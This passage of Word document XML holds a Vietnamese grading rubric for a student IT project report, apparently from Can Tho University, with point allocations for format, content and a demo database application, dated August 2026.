            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="17"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1407" w:tblpY="1028"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9279" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7800"/>
        <w:gridCol w:w="1479"/>
      </w:tblGrid>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pStyle w:val="19"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>hình thức</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 0,5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widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Bìa </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 0,25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widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Các tiêu đề: Trường ĐHCT, Khoa CNTT, Bộ môn HTTT&amp;TƯD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Loại niên luận: 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Tên đề tài</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Giáo viên hướng dẫn: chức danh, họ tên</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Thông tin về các sinh viên thực hiện: họ tên, mã số, lớp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Năm thực hiện</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Bố cục</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 0,25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PrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Nhận xét của giáo viên hướng dẫn và giáo viên chấm </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Mục lục: cấu trúc chương, mục và tiểu mục </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Phụ lục (nếu có) </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Tài liệu tham khảo </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pP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pStyle w:val="19"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Nội dung</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 2,5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widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Giới thiệu </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 1,0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vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Mô tả bài toán </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Mục tiêu cần đạt, hướng giải quyết</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cstheme="minorBidi"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Ứng dụng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 1,5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PrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Lưu đồ các mô-đun </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Giới thiệu sử dụng chương trình </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cstheme="minorBidi"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Kết luận </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 0,5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vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Nhận xét kết quả đạt được</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Hạn chế</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Hướng phát triển</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pStyle w:val="19"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Chương trình demo</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(tối đa 6,0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vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cstheme="minorBidi"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Giao diện thân thiện với người dùng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>( 1,0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PrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cstheme="minorBidi"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Hướng dẫn sử dụng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(0,5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vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cstheme="minorBidi"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Kết quả thực hiện đúng với kết quả của phần ứng dụng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i/>
                <w:iCs/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>(4,5 điểm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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c>
          <w:tcPr>
            <w:tcW w:w="7800" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Cài đặt CSDL cùng với các ràng buộc toàn vẹn </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Forms cập nhật đúng </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">▪ Reports hợp lý </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:ind w:left="720" w:leftChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>▪ Tính sáng tạo trong cài đặt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:tcBorders>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Cần Thơ, ngày .......... tháng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> năm 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="4320" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
